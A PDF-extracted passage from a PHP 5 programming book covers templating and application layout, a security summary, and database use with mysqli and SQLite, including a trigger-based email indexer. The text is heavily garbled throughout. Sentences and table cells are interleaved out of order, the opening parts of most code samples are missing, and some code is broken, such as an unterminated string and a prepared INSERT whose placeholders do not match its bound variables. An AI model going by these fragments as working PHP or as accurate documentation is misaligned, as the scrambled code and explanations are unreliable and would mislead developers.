172 Gutmans_ch05 Page 144 Thursday, September 23, 2004 2:41 PM 144 How to Write a Web Application with PHP Chap. 5 } } if registered_module($_GET['module']) { $driver = new $_GET['module']; $driver->execute(); } ?> 5.9.2 One Script per Function Another alternative is the one script per function approach. Here, there is no driver script like in the previous section, but each function is stored in a dif- , where in about.php ferent script and accessed through its URL (for example, index.php?page=about ). Both styles have pros the previous example, we had and cons; in the “one script serves all” method, you only have to include the basics (like session handling, connecting to a database) in one script, while with this method, you have to do that in each script that implements the func- tionality. On the other hand, a monolithic script is often harder to maintain (because you have to dig through more files to find your problem). Of course, it’s always up to you, the programmer, to make decisions regarding the layout of your application. The only real advice that we can give is that you always need to think before you implement. It helps to sit down and brainstorm about how to lay out your code. 5.9.3 Separating Logic from Layout In each of the two approaches, you always need to strive to separate your logic from the layout of your pages. There are a few ways to do this—for example, with a templating engine (see Chapter 14, “Performance”)—but you can also use your own templating method, perhaps something similar to this example: template.tpl: <?php echo $tpl['title']; ?>

173 Gutmans_ch05 Page 145 Thursday, September 23, 2004 2:41 PM 5.9 Architecture 145 This file is the “static” part of the site, and it’s the same for most pages. It’s simply HTML with some PHP statements to echo simple variables that are filled in by logic in the script that uses this template. list_parts.tpl.php : NameCity END; $footer = << END; $item = "{name}{city}"; ?> This file contains elements for use in a dynamic list. You see that in the variable, we also have two placeholders ( {name} and $item ) which are {city} used by the logic to fill in data. : show_names.php 'Tel Aviv', 'Derick' => 'Skien', 'Stig' => 'Trondheim); ➥ $items = ''; foreach ($list as $name => $city) { $items .= str_replace( array('{name}' , '{city}'), array($name, $city), $item ); }

174 Gutmans_ch05 Page 146 Thursday, September 23, 2004 2:41 PM 146 How to Write a Web Application with PHP Chap. 5 After initializing our variables, we loop through the array and concate- nate the filled-in $items variable, which will contain the $item variable to the layout for all items in the list: $tpl = array(); $tpl['title'] = "List with names"; $tpl['description'] = "This list shows names and the cities."; $tpl['content'] = $header . $items . $footer; include 'template.tpl'; ?> array, fill in the items that the template wants, At last, we create the $tpl and include the template file. Because the variables are now set, the included template is displayed with the data filled in. This is, of course, only one method of attacking this problem; I’ll leave the rest to your imagination. 5.10 S UMMARY PHP is easily embedded into HTML files, displaying HTML forms that collect data entered by users and files that users upload. Collecting information from users presents security issues for the web site and for any user information stored at the web site. For security, PHP should have set to register_globals . To attack your web site or steal your data, the bad guys use techniques Off like cross-site scripting (executing pieces of client side scripting on your site) and SQL injection (inserting malicious code into queries run on your data- base). To protect against attacks, you must distrust all data that originates from users. You need to carefully validate all data that you receive from users and test it carefully to be sure it is safe, not dangerous to your web site. You can protect your web site when users upload files by checking the file size and type of the uploaded file. In addition, you can protect the information that is visible in your browser address window—information passed in the URL—by hashing it using one of several methods, including a PEAR class, called Crypt_HMAC , which was developed for hashing purposes. Hashing is also useful to protect passwords stored for the purpose of authenticating users. Another useful measure to protect your web site from user mistakes or bad-guy attacks is to develop your own error handler to recognize when something is not as it should be and to handle the problem. For a web application to be useful, the application data must be available to all the web pages in the application during a user session. One way to pass data from one web page to the next is by using cookies. When the user accesses the web page, a login page is displayed and the account and password entered by the user into the form are checked against the account and password that

175 Gutmans_ch05 Page 147 Thursday, September 23, 2004 2:41 PM 5.10 Summary 147 are stored for the user. If the user is authenticated, a cookie is set. The infor- mation in the cookie is automatically passed with any requested page. A sec- ond method of making data persistent across web pages is to use the PHP session features. Once you start a PHP session, you can store variables that are available to other scripts in the session. Once you know all the pieces you need for your web application, you need to organize them into a useful whole. One common method of organization is index.php handles all the called “one script serves all,” which means that requests for different pages. Another common organization is “one script per function.” A general principle is to separate layout from logic. After you orga- nize the pieces into a comprehensive application, you’re off to the races.

176 Gutmans_ch05 Page 148 Thursday, September 23, 2004 2:41 PM

177 Gutmans_ch06 Page 149 Thursday, September 23, 2004 2:43 PM CHAPTER 6 Databases with PHP 5 6.1 I NTRODUCTION A ubiquitous part of any PHP book is the topic of databases and database interfacing with PHP. This book is no different, simply because most people who write PHP applications want to use a database. Many good books exist on database design and using databases with PHP. This chapter introduces using MySQL and SQLite from PHP, but focuses primarily on the PHP 5, specific details of database interfacing. After you finish reading this chapter, you will have learned Some of the strong and weak points of MySQL and SQLite, and which ☞ types of applications at which they excel ☞ extension Interfacing with MySQL with the new mysqli ☞ sqlite extension How to use PHP 5’s bundled ☞ How to use PEAR DB to write more portable database code A Note About Version Numbers This chapter focuses on the new database connectivity features of PHP 5, sqlite and extensions. To enjoy all the new functionality mysqli specifically the described in this chapter, you need reasonably current versions of the various packages: ☞ MySQL 4.1.2 or newer ☞ SQLite as bundled with PHP 5.0.0 or newer ☞ PEAR DB 1.6 or newer SQL 6.2 M Y MySQL and PHP have become the “bread and butter” of web application builders. It is the combination you are most likely to encounter today and probably for the years to come. Consequently, this is also the first database covered in this chapter. mysqli This chapter focuses on the new —or MySQL Improved—extension mysqli that is bundled with PHP 5. As mentioned in the chapter introduction, the extension requires that you use at least version 4.1.2 of the MySQL server. 149

178 Gutmans_ch06 Page 150 Thursday, September 23, 2004 2:43 PM Databases with PHP 5 Chap. 6 150 6.2.1 MySQL Strengths and Weaknesses This section contains some information about the strengths and weaknesses of MySQL. MySQL has the biggest market 6.2.1.1 Strength: Great Market Penetration share of any open source database. Almost any web-hosting company can pro- vide MySQL access, and books and articles about MySQL and PHP are abun- dant. After your database is set up and you 6.2.1.2 Strength: Easy to Get Started have access to it, managing the database is straightforward. Initial access needs to be configured by a database administrator (if that person is not you). phpMyAdmin let you manage your Tools such as MySQL Administrator or database. MySQL comes with 6.2.1.3 Strength: Open-Source License for Most Users a dual license—either GPL or a commercial license. You can use MySQL under the GPL as long as you are not commercially redistributing it. 6.2.1.4 Strength: Fast MySQL has always been relatively fast, much due to its simplicity. In the last few years, MySQL has gained foothold in the enter- prise market due to new “enterprise class” features and general maturity without compromising performance for simple usage. 6.2.1.5 Weakness: Commercial License for Commercial Redistribution If you bundle MySQL (server or client) with a commercial closed-source product, you need to purchase a license. MySQL AB have published a FOSS (Free or Open-Source Software) exception to MySQL’s license that grants all free or open-source products an exception from this restriction. 6.2.1.6 Strength: Reasonable Scalability MySQL used to be a lightweight database that did not have to drag around most of the expensive reliability features (such as transactions) of systems such as Oracle or IBM DB2. This was, and still is, one of the most important reasons for MySQL’s high perfor- mance. Today, MySQL has evolved to almost match its commercial seniors in scalability and reliability, but you can still configure it for lightweight use. 6.2.2 PHP Interface mysqli PHP extension was written from the ground up to support the new The features of the MySQL 4.1 and 5.0 Client API. The improvements from the old mysql extension include the following:

179 Gutmans_ch06 Page 151 Thursday, September 23, 2004 2:43 PM 6.2 MySQL 151 Native bind/prepare/execute functionality ☞ Cursor support ☞ error codes SQLSTATE ☞ Multiple statements from one query ☞ ☞ Index analyzer The following sections give an overview of how to use the mysqli extension, and mysql how it differs from the old extension. mysqli Almost every function has a method or property counterpart, and the following list of functions describes both of them. The notation for the methods is similar to $mysqli->connect() for regular methods, calling connect() mysqli in an instance of the class. mysqli functions and The parameter list is usually the same between methods, except that functions in most cases have an object parameter first. Following that, function parameter lists are identical to that of their method counterparts. For the sake of brevity, ... replaces the method parameter list in the parameter descriptions. 6.2.3 Example Data This section uses data from the “world” example database, available at http:// dev.mysql.com/get/Downloads/Manual/world.sql.gz/from/pick. 6.2.4 Connections mysqli Table 6.1 shows the functions that are related to connections.

180 Gutmans_ch06 Page 152 Thursday, September 23, 2004 2:43 PM 152 Databases with PHP 5 Chap. 6 Table 6.1 mysqli Connection Functions and Methods Function Name Description mysqli_connect(...) Opens a connection to the MySQL server. Para- $mysqli = new mysqli(...) meters (all are optional) • host name (string) (string) • user name • (string) password • database name (string) • TCP port (integer) • UNIX domain socket (string) mysqli_init() Initializes MySQLi and returns an object for use $mysqli = new mysqli mysqli_real_connect with mysqli_options(...) Set various connection options $mysqli->options(...) Opens a connection to the MySQL server mysqli_real_connect(...) $mysqli->real_connect(...) mysqli_close(...) Closes a MySQL server connection $mysqli->close() The parameter is connection object (function only) mysqli_connect_errno() Obtains the error code of the last failed connect mysqli_connect_error() Obtains the error message of the last failed connect mysqli_get_host_info(...) Returns a string telling what the connection is $mysqli->host_info connected to Here is a simple example:

181 Gutmans_ch06 Page 153 Thursday, September 23, 2004 2:43 PM 153 6.2 MySQL host_info . "\n"; $mysqli->close(); Sometimes, you might need some more options when connecting to a mysqli_init , mysqli_options MySQL server. In this case, you can use the , and functions, which allow you to set different options for your mysqli_real_connect database connection. The following example demonstrates how you can use these functions: options(MYSQLI_INIT_CMD, "SET AUTOCOMMIT=0"); $mysqli->options(MYSQLI_READ_DEFAULT_FILE, "SSL_CLIENT"); $mysqli->options(MYSQLI_OPT_CONNECT_TIMEOUT, 5); $mysqli->real_connect("localhost", "test", "", "world"); if (mysqli_connect_errno) { die("mysqli_connect failed: " . mysqli_connect_error()); } print "connected to " . $mysqli->host_info . "\n"; $mysqli->close(); mysqli_options The functions allow you to set the options shown in Table 6.2. Constants mysqli_options Table 6.2 Description Option Specifies the connection timeout in seconds MYSQLI_OPT_CONNECT_TIMEOUT MYSQLI_OPT_LOCAL_INFILE Enables or disables the use of the LOAD LOCAL MYSQLI_INIT_CMD INFILE command Specifies the command that must be executed MYSQLI_READ_DEFAULT_FILE after connect MYSQLI_READ_DEFAULT_GROUP Specifies the name of the file that contains named options Reads options from the named group from my.cnf (or the file specified with MYSQLI_READ_ DEFAULT_FILE) 6.2.5 Buffered Versus Unbuffered Queries The MySQL client has two types of queries: buffered and unbuffered queries. Buffered queries will retrieve the query results and store them in memory on the client side, and subsequent calls to get rows will simply spool through local memory.

182 Gutmans_ch06 Page 154 Thursday, September 23, 2004 2:43 PM 154 Databases with PHP 5 Chap. 6 Buffered queries have the advantage that you can seek in them, which means that you can move the “current row” pointer around in the result set freely because it is all in the client. Their disadvantage is that extra memory is required to store the result set, which could be very large, and that the PHP function used to run the query does not return until all the results have been retrieved. Unbuffered queries , on the other hand, limit you to a strict sequential access of the results but do not require any extra memory for storing the entire result set. You can start fetching and processing or displaying rows as soon as the MySQL server starts returning them. When using an unbuffered mysqli_fetch_row or close the result set, you have to retrieve all rows with before sending any other command to the mysqli_free_result result set with server. Which type of query is best depends on the situation. Unbuffered queries save you a lot of temporary memory when the result set is large, and if the query does not require sorting, the first row of results will be available in PHP while the MySQL database is actually still processing the query. Buffered que- ries are convenient because of the seeking feature; it could provide an overall speedup. Because each individual query would finish faster, the exten- mysqli sion would drain the result set immediately and store it in memory instead of keeping the query active while processing PHP code. With some experience and relentless benchmarking, you will figure out what is best for you. Another limitation for unbuffered queries is that you will not be able to send any command to the server unless all rows are read or the result set is freed by . mysqli_free_result 6.2.6 Queries This section describes functions and methods for executing queries see Table 6.3). mysqli Table 6.3 Query Functions Function Name Description mysqli_query(...) Sends a query to the database and returns a result object. Parameters: • connection (function only) • (string) query • mode (buffered or unbuffered) mysqli_multi_query(...) Sends and processes multiple queries at $mysqli->multi_query(...) once. Parameters: • connection object (function only) • query (string)

183 Gutmans_ch06 Page 155 Thursday, September 23, 2004 2:43 PM 6.2 MySQL 155 mysqli_query() function returns a result set object. On failure, use The function or the mysqli_error() $conn->error the property to determine the cause of the failure: query("SELECT Name FROM City"); while ($row = $result->fetch_row()) { print $row[0] . "
\n"; } $result->free(); $conn->close(); After the query has been executed, memory on the client side is allocated to retrieve the complete result set. To use unbuffered resultset , you have to specify the optional parameter MYSQLI_USE_RESULT : query("SELECT Name FROM City", MYSQLI_USE_RESULT); while ($row = $result->fetch_row()) { print $row[0] . "
\n"; } $result->free(); $conn->close(); 6.2.7 Multi Statements mysqli extension enables you to send multiple SQL statements in one The function call by using . The query string contains one or mysqli_multi_query more SQL statements that are divided by a semicolon at the end of each state- ment. Retrieving result sets from multi statements is a little bit tricky, as the following example demonstrates: multi_query($query)) { do { if ($result = $mysqli->store_result()) { while ($row = $result->fetch_row()) { printf("Col: %s\n", $row[0]; } $result->close(); }

184 Gutmans_ch06 Page 156 Thursday, September 23, 2004 2:43 PM 156 Databases with PHP 5 Chap. 6 } while ($conn->next_result()); } $conn->close(); 6.2.8 Fetching Modes mysql extension: as There are three ways to fetch rows of results, as in the old an enumerated array, as an associative array, or as an object (see Table 6.4). Fetch Functions mysqli Table 6.4 Function Name Description mysqli_fetch_row(...) Sends a query to the database and buffers $mysqli->fetch_row() the results. Its parameter is the result object (function only). mysqli_fetch_assoc(...) Fetches all the results from the most recent $result->fetch_assoc() query on the connection and stores them in memory. Its parameter is connection resource (function only). mysqli_fetch_object(...) Fetches a row into an object. Its parameter is $result->fetch_object() the result object (function only). 6.2.9 Prepared Statements One of the major advantages of the mysqli extension as compared to the mysql provide develop- Prepared statements extension are prepared statements. ers with the ability to create queries that are more secure, have better perfor- mance, and are more convenient to write. There are two types of prepared statements: one that executes data manipulation statements, and one that executes data retrieval statements. Prepared statements allow you to bind PHP variables directly for input and output. Creating a prepared statement is simple. A query template is created and sent to the MySQL server. The MySQL server receives the query tem- plate, validates it to ensure that it is well-formed, parses it to ensure that it is meaningful, and stores it in a special buffer. It then returns a special handle that can later be used to reference the prepared statement. 6.2.9.1 Binding Variables There are two types of bound variables: input that are output variables that are bound to the statement, and variables bound to the result set. For input variables, you need to specify a question mark as a placeholder in your SQL statement, like this: SELECT Id, Country FROM City WHERE City=? INSERT INTO City (Id, Name) VALUES (?,?)

185 Gutmans_ch06 Page 157 Thursday, September 23, 2004 2:43 PM 6.2 MySQL 157 Output variables can be bound directly to the columns of the result set. The procedure for binding input and output variables is slightly different. Input variables must be bound before executing a prepared statement, while output variables must be bound after executing the prepared statement. The process for input variables is as follows: Preparing (parsing) the statement 1. 2. Binding input variables Assigning values to bound variables 3. Executing the prepared statement 4. The process for output variables is as follows: Preparing (parsing) the statement 1. Executing prepared statement 2. Binding output variables 3. 4. Fetching data into output variables Executing a prepared statement or fetching data from a prepared state- ment can be repeated multiple times until the statement will be closed or there are no more data to fetch (see Table 6.5). Prepared Statement Functions Table 6.5 mysqli Description Function Name mysqli_prepare(...) Prepares a SQL statement for execution. $mysqli->prepare() Parameters: • 0 Connection object (function only) • 1 Statement mysqli_stmt_bind_result(...) Binds variables to a statement's result set. $stmt->bind_result(...) Parameters: • 0 Statement object (function only) • 1 Variables mysqli_stmt_bind_param(...) Binds variables to a statement. $stmt->bind_result(...) Parameters: • 2 Statement object (function only) • 3 String that specifies the type of variable ( i s d =double, b =blob) =string, =number, • 4 Variables mysqli_stmt_execute(...) Executes a prepared statement. Parame- $stmt->execute ters include a statement object (function only). mysqli_stmt_fetch(...) Fetches data into output variables. The $stmt->fetch parameter includes the object statement (function only). mysqli_stmt_close(...) Closes a prepared statement. $stmt->close()

186 Gutmans_ch06 Page 158 Thursday, September 23, 2004 2:43 PM 158 Databases with PHP 5 Chap. 6 Here is an example of a data manipulation query using bound input variables: query("CREATE TABLE alfas ". "(year INTEGER, model VARCHAR(50), accel REAL)"); $stmt = $conn->prepare("INSERT INTO alfas VALUES(?, ?)"); $stmt->bind_param("isd", $year, $model, $accel); $year = 2001; $model = '156 2.0 Selespeed'; $accel = 8.6; $stmt->execute(); $year = 2003; $model = '147 2.0 Selespeed'; $accel = 9.3; $stmt->execute(); $year = 2004; $model = '156 GTA Sportwagon'; $accel = 6.3; $stmt->execute(); Here is an example of using binding for retrieving data: prepare("SELECT * FROM alfas ORDER BY year"); $stmt->execute(); $stmt->bind_result($year, $model, $accel); print "

\n"; print "\n"; while ($stmt->fetch()) { print "\n"; } print "
Model0-100 km/h
$year $model{$accel} sec
\n"; $year , $model , and $accel to the columns of the "alfas" Here, we bind $stmt->fetch() call modifies these variables with data from the table. Each fetch() current row. The TRUE until there is no more data, then method returns FALSE it returns . 6.2.10 BLOB Handling BLOB stands for Binary Large OBject and refers to binary data, such as JPEG images stored in the database.

187 Gutmans_ch06 Page 159 Thursday, September 23, 2004 2:43 PM 6.2 MySQL 159 Previously, with the mysql 6.2.10.1 Inserting BLOB Data PHP extension, BLOB data was inserted into the database directly as part of the query. You mysqli can still do this with , but when you insert several kilobytes or more, a more efficient method is to use the mysqli_stmt_send_long_data() function or method of the stmt class. the send_long_data() Here is an example: query("CREATE TABLE files (id INTEGER PRIMARY KEY AUTO_INCREMENT, ". ➥ "data BLOB)"); $stmt = $conn->prepare("INSERT INTO files VALUES(NULL, ?)"); $stmt->bind_param("s", $data); $file = "test.jpg"; $fp = fopen($file, "r"); $size = 0; while ($data = fread($fp, 1024)) { $size += strlen($data); $stmt->send_long_data(0, $data); } //$data = file_get_contents("test.jpg"); if ($stmt->execute()) { print "$file ($size bytes) was added to the files table\n"; } else { die($conn->error); } In this example, the test.jpg file is inserted into the file’s table by trans- ferring 1,024 bytes at a time to the MySQL server with the send_long_data() method. This technique does not require PHP to buffer the entire BLOB in mem- ory before sending it to MySQL. Retrieving BLOB data is the same as 6.2.10.2 Retrieving BLOB Data retrieving regular data. Use any of the fetch function/method variants as you see fit. Here is an example: query("SELECT id, length(data) FROM files LIMIT ➥ 20");

188 Gutmans_ch06 Page 160 Thursday, September 23, 2004 2:43 PM 160 Databases with PHP 5 Chap. 6 if ($result->num_rows == 0) { print "No images!\n"; print "Click here to add one ➥ \n"; exit; } while ($row = $result->fetch_row()) { print ""; print "image $row[0] ($row[1] bytes)
\n"; } exit; } $stmt = $conn->prepare("SELECT data FROM files WHERE id = ?"); $stmt->bind_param("i", $_GET['id']); $stmt->execute(); $data = null; $stmt->bind_result($data); if (!$stmt->fetch()) { die("No such image!"); } header("Content-type: image/jpeg"); print $data; 6.3 SQL ITE PHP 5 introduced a new bundled and, by default, an available “database” engine called . SQLite 6.3.1 SQLite Strengths and Weaknesses This section describes the characteristics of SQLite compared to other DBM- Ses. 6.3.1.1 Strength: Self-Contained, No Server Required SQLite does not use a client/server model. It is embedded in your application, and only requires access to the database files. This makes integrating SQLite into other applica- tions easier because there is no dependency on an external service. 6.3.1.2 Strength: Easy to Get Started Setting up a new database with SQLite is easy and requires no intervention from system administrators. 6.3.1.3 Strength: Bundled with PHP 5 The entire SQLite engine is bundled with PHP 5. There is no need to install extra packages to make it available to PHP developers.

189 Gutmans_ch06 Page 161 Thursday, September 23, 2004 2:43 PM 6.3 SQLite 161 The newest of the databases covered 6.3.1.4 Strength: Lightweight and Fast in this chapter, SQLite has little compatibility baggage and still has a lean and light design. For most queries, it is on par with or exceeds the perfor- mance of MySQL. 6.3.1.5 SQLite’s PHP ex- Strength: Both a Procedural and an OO Interface tension features both procedural interfaces and an object-oriented interface. The latter makes it possible to have less code, and is, in some cases, faster than its procedural alternative. Although this is one of SQLite's 6.3.1.6 W eakness: No Server Process strong points, the fact that SQLite has no server process leads to a series of scaling difficulties: file locking and concurrency issues, lack of persistent query caches, and scaling problems when handling very large data volumes. Also, the only way to share a database between hosts is to share the file system with the database file. This way of running remote queries is much slower than sending queries and responses through a network socket, as well as less reliable. 6.3.1.7 Weakness: Not Binary Safe SQLite does not handle binary data natively. To put binary data in a SQLite database, you first need to encode it. Likewise, after a SELECT, you need to decode the encoded binary data. 6.3.1.8 Weakness: Transactions Lock All Tables Most databases lock indi- vidual tables (or even only rows) during transactions, but because of its imple- mentation, SQLite locks the database on inserts, which makes whole concurrent read/write access dramatically slow. 6.3.2 Best Areas of Use SQLite’s primary point of excellence is that it is stand alone and extremely well suited for web-hosting environments. Because the SQLite client works on files, there is no need to maintain a second set of credentials for database access; if you can write to the database file, you can make changes in the data- base. Hosting companies just need to support the SQLite PHP extension, and their customers can take care of the rest. A hosting company can limit the maximum size of databases (in combi- nation with other data in the web space) easily because the SQLite database is just a file that takes space inside the web space of its customer. SQLite excels at stand alone applications. Especially in web-hosting environments where there are many read queries and little write queries, the speed of SQLite is fully shown. An example of such an application might be a weblog where all hits pull out comments from the database, but where only a few comments are added.

190 Gutmans_ch06 Page 162 Thursday, September 23, 2004 2:43 PM 162 Databases with PHP 5 Chap. 6 6.3.3 PHP Interface In this section, we present a full-fledged example using most of SQLite's fea- ture sets. Each subsection introduces you to a new step in building an auto- matic indexed email storage system. We use the OO-based API in the examples, but also mention the procedural equivalent. The way this works is similar to the MySQLi extension. 6.3.3.1 Setting Up Databases Because SQLite doesn’t require a daemon to function, setting up a database is in fact nothing more than creating a spe- cially formatted file. To create a new database, you simply try to open one; if the database does not exist, a new one will be created for you. That’s the rea- son why the second parameter to the constructor can be used to specify the permissions for the created database. create.php script, which creates The example script we start with is the the database and all tables inside our database (see Table 6.6). Opening and Closing Databases Table 6.6 Description Function Name sqlite_open(...) Connects the script to an SQLite database, or $sqlite = new SQLiteData- creates one if none exists yet. Parameters: base(...) • The path and file name (string) • Permissions in UNIX style (octal number) chmod • Error message (by-reference, string) sqlite_close(...) Disconnects the script from an SQLite database connection. The parameter is the SQLite descriptor. You can also create in-memory databases by using the special keyword constructor. This as the first parameter to the ":memory:" SQLiteDatabase allows for ultra-fast temporary SQL power. Do not forget to store your data somewhere else before ending a script; if you do not, the data you put into the database is gone. Here’s an example: 6.3.3.2 Simple Queries When the database is opened, we can start execut- ing queries on the database. Because no tables are available in a new data- base, we have to create them first. The following example explains how to do this:

191 Gutmans_ch06 Page 163 Thursday, September 23, 2004 2:43 PM 6.3 SQLite 163 query($create_query); ?> If you are familiar with other database systems, you will most likely CREATE TABLE notice the absence of types for some of the field definitions in the queries shown earlier. SQLite actually has only two types internally: INTEGER , "something else" , which can be compared which is used to store numbers, and VARCHAR field in other databases. SQLite’s VARCHAR can store more than 255 to a characters, though, which is sometimes a limitation in other database sys- tems. You can also make an field auto-increment by adding "PRIMARY INTEGER as a postfix to the field definition. Of course, you can do this for only one KEY" field per table. Something else that you might notice is that we execute multiple CREATE TABLE queries with one function call to the query() method. This is often not possible with other PHP interfaces to other database systems, such as the ( not MySQLi ) extension. MySQL SQLite’s error handling is a bit flakey because each 6.3.3.3 Error Handling of the query functions might throw a warning. It is therefore important to prepend the query functions with the “shut-up” operator . The result of the @ FALSE to see if the query succeeded. function then needs to be checked against sqlite_last_error() and If it did not succeed, you can use sqlite_error_string() to retrieve a textual description of the error. Unfortu- nately, this error message is not very descriptive, either.

192 Gutmans_ch06 Page 164 Thursday, September 23, 2004 2:43 PM 164 Databases with PHP 5 Chap. 6 SQLiteException , which you SQLite’s constructor might also throw an block). There will be some future try...catch need to handle yourself (with a work on SQLite’s error handling, but that’s likely something for PHP 5.1. 6.3.3.4 Simpler Queries and Transactions By creating only the tables, our email indexer still does nothing useful, so the next step is to add the emails "insert.php" . Here is part into our database. We do that in a new script called of its code: \n\n"; return; } First, we open the database and check if the number of parameters to this command-line script is correct. The first (and only) parameter passed to this script is the mailbox (in UNIX, the MBOX format) we’re going to store and later index. $body = file_get_contents($argv[1]); $mails = preg_split('/^From /m', $body); unset($body); We load the mailbox into memory and split it into separate emails with a reg- ular expression. You might wonder what happens if a line in an email starts From: ; in this case, the UNIX format requires this From: to be escaped with MBOX > with the character. // $db->query("BEGIN"); foreach ($mails as $id => $mail) { $safe_mail = sqlite_escape_string($mail); $insert_query = " INSERT INTO document(title, intro, body) VALUES ('Title', 'This is an intro.', '{$safe_mail}') "; echo "Indexing mail #$id.\n"; $db->query($insert_query); } // $db->query("COMMIT"); ?> Here, we loop over the mails, making sure we escape all possible dangerous characters with the functions, and insert the data into sqlite_escape_string() the database with the query() method.

193 Gutmans_ch06 Page 165 Thursday, September 23, 2004 2:43 PM 6.3 SQLite 165 sqlite Quoting Function Table 6.7 Function Name Description sqlite_escape_string(...) Escapes a string for use as parameter to a query By default, SQLite commits all queries directly to disk, which makes the inserting of many queries rather slow. Another problem that might arise is that other processes can insert data into the database during the process of importing our emails. To fix those two problems, you can simply use a transac- tion to perform the entire importing. To start a transaction, you can execute a BEGIN TRANSACTION ". At the end of the trans- query containing " BEGIN " or simply " " query to commit all queries in the transaction COMMIT action, you can use the " to disk. In the full example (including the tricks we discuss later in this sec- tion), the time for importing 638 emails dropped from 60m29s to 1m59s, which is quite a speed boost. SQLite has some advanced features—for example, it sup- 6.3.3.5 Triggers can be set to data-modifying queries, and consist of a Triggers ports triggers. small SQL script that runs whenever the specified action is “triggered.” Our example will use triggers to automatically update our search index whenever a new document is added. To define the trigger, we extend our create.php script and add the following code to the file: ... $trigger_query = " CREATE TRIGGER index_new AFTER INSERT ON document BEGIN SELECT php_index(new.id, new.title, new.intro, new.body); END;"; $db->query($trigger_query); ?> This creates a trigger named index_new to be run after an insert query on document table. The SQL script that runs when the trigger fires is a simple the select query, but that query is not that simple as it appears. You can see that there is no FROM clause, nor is the php_index() function a function defined in the SQL standard. This brings us to the next cool feature of SQLite: User Defined Functions. Because SQLite is Lite, it does not 6.3.3.6 User-Defined Functions (UDFs) implement all the default SQL functions, but SQLite does provide you with the possibility to write your own functions that you then can use from your SQL queries.

194 Gutmans_ch06 Page 166 Thursday, September 23, 2004 2:43 PM 166 Databases with PHP 5 Chap. 6 sqlite UDF Functions Table 6.8 Function Name Description sqlite_create_function(...) Binds an SQL function to a user defined function $sqlite->createFunction(...) in your PHP script. Parameters: • DB handle (procedural only) • SQL function name (string) • PHP function name (string) • Number of arguments to the function (integer, optional) We’re adding this function registration call after the argument check in : insert.php ... $db->createFunction("php_index", "index_document", 4); ... index_document . We place this func- Of course, we create this new PHP function tion, with another helper function at the start of our script: function normalize($body) { $body = strtolower($body); $body = preg_replace( '/[.;,:!?¿¡\[\]@\(\)]/', ' ', $body); $body = preg_replace('/[^a-z0-9 -]/', '_', $body); return $body; } This helper function strips non-wanted characters and lowercase charac- ters, and changes punctuation marks to spaces. It is used to normalize the words we put into our search index. After the helper function, our main func- tion begins as follows: function index_document($id, $title, $intro, $body) { global $db; Because this function is called through SQLite, we need to import our database handle into the function’s scope; we do that with the global keyword: $id = $db->singleQuery("SELECT max(id) from document"); Because of a bug in the SQLite library, we have to figure out the latest auto-increment value ourselves because we cannot trust the value passed through our callback function by SQLite. Using the PHP function sqlite_last_insert_row_id() (or the OO variant lastInsertRowId() ) did not work here, either. $body = substr($body, 0, 32000); $body = normalize($body);

195 Gutmans_ch06 Page 167 Thursday, September 23, 2004 2:43 PM 6.3 SQLite 167 Here, we reduce the body to only 32KB with the reason that emails larger than this usually have an attachment, and that's not important to put into our index. After that, the text is normalized so that we can make a nice search index out of it: $words = preg_split( '@([\W]+)@', $body, -1, PREG_SPLIT_OFFSET_CAPTURE | PREG_SPLIT_NO_EMPTY ); This regular expression splits the body into words and calculates their position in the message (you can find more about regular expressions in Chap- ter 9, “Mainstream Extensions”). foreach ($words as $word) { $safe_word = sqlite_escape_string($word[0]); if ((strpos($safe_word, '_') === false) && (strlen($safe_word) < 24)) { Here, we start looping over all the words that the regular expression cre- ated. We escape the word, and enter only the index section of this function if there is no underscore present in the word, and when it is smaller than 24 characters. $result = @$db->query( "INSERT INTO dictionary(word) ". "VALUES('$safe_word');"); if ($result != SQLITE_OK) { /* already exists, need to fetch the * ID then */ $word_id = $db->singleQuery( "SELECT id FROM dictionary ". "WHERE word = '$safe_word'"); } else { $word_id = $db->lastInsertRowID(); } Here, we insert our word into the dictionary table, relying on the unique key of the word to prevent duplicate entries. In case the word already exists in the dic- tionary, the query will fail and we run a SELECT query to obtain the ID of the word singleQuery() method; otherwise, we request the ID with which the new with the singleQuery() word was inserted into the database. The method runs the query, and returns the first column of the first record returned by the query. $db->query( "INSERT INTO ". "lookup(document_id, word_id, position) ". "VALUES($id, $word_id, {$word[1]})"); } } }

196 Gutmans_ch06 Page 168 Thursday, September 23, 2004 2:43 PM 168 Databases with PHP 5 Chap. 6 document_id and the When we know the ID of the word, we insert it with the position into the lookup table (see Table 6.9). Table 6.9 sqlite_last_insert_row_id and sqlite_single_query Description Function Name sqlite_last_insert_row_id(...) Returns the ID of the last inserted data in an $sqlite->lastInsertRowId() auto increment column. The procedural version requires the database handler as its only parameter. sqlite_single_query(...) Executes a query and returns the first column $sqlite->singleQuery(...) of the first record. Parameters: • The database handle (function only) • The query to execute (string) 6.3.3.7 Other Querying Functions method is one of many singleQuery() The specialized functions for data retrieval. They are added for performance rea- sons, and there are a few more than we’ve already seen (see Table 6.10). Query Functions and Methods Table 6.10 Function Name Returns Description sqlite_query() handle Executes a simple query. $sqlite->query() sqlite_unbuffered_query() Executes a query, but does not handle $sqlite->unbufferedQuery() buffer the result in the client. $sqlite->queryExec() Executes a chained query (multiple boolean sqlite_exec() queries separated by a ;) without result. $sqlite->arrayQuery() Execute a query and returns an data sqlite_array_query() array with all rows and columns in a two-dimensional array. $sqlite->singleQuery() data Executes a query and returns the sqlite_single_query() first column of the first returned record. 6.3.3.8 Fetching Data For the two functions that return handles to the resource, there is a complementary group of functions to actually fetch the data (see Table 6.11).

197 Gutmans_ch06 Page 169 Thursday, September 23, 2004 2:43 PM 6.3 SQLite 169 Fetching Functions and Methods Table 6.11 Description Function Name sqlite_fetch_array() Returns the next row as an array. Parameters: $sqlite->fetch() • Result resource (function only) • Mode ( SQLITE_ASSOC, SQLITE_NUM , or SQLITE_BOTH ) sqlite_fetch_object() Returns the next row as an object with a chosen $sqlite->fetchObject() class. Parameters: • Result resource (function only) • Class name (string) • Parameters to the constructor (array) sqlite_fetch_single() Returns the first column of the next row. Its sqlite_fetch_string() parameter is the result resource (functions only). $sqlite->fetchSingle() $sqlite->fetchAll() Returns the whole result set as a two- sqlite_fetch_all() dimensional array. Parameters: • Result resource (functions only) • The mode ( SQLITE_ASSOC , , or SQLITE_NUM ) SQLITE_BOTH mode parameter determines how a result will be returned. When the The SQLITE_ASSOC mode is used, the returned array will have the fields indexed by field name. When the is used, the fields will be indexed by a field SQLITE_NUM number only. When SQLITE_BOTH is used, there will be a numerical index and a field name index for each field in the returned array. One of the more interesting fetch functions is $sqlite->fetchObject() , and thus, we present a small example here (which has nothing to do with our email indexing scripts): intro); $db->query( "UPDATE document SET intro = '$intro' ". "WHERE 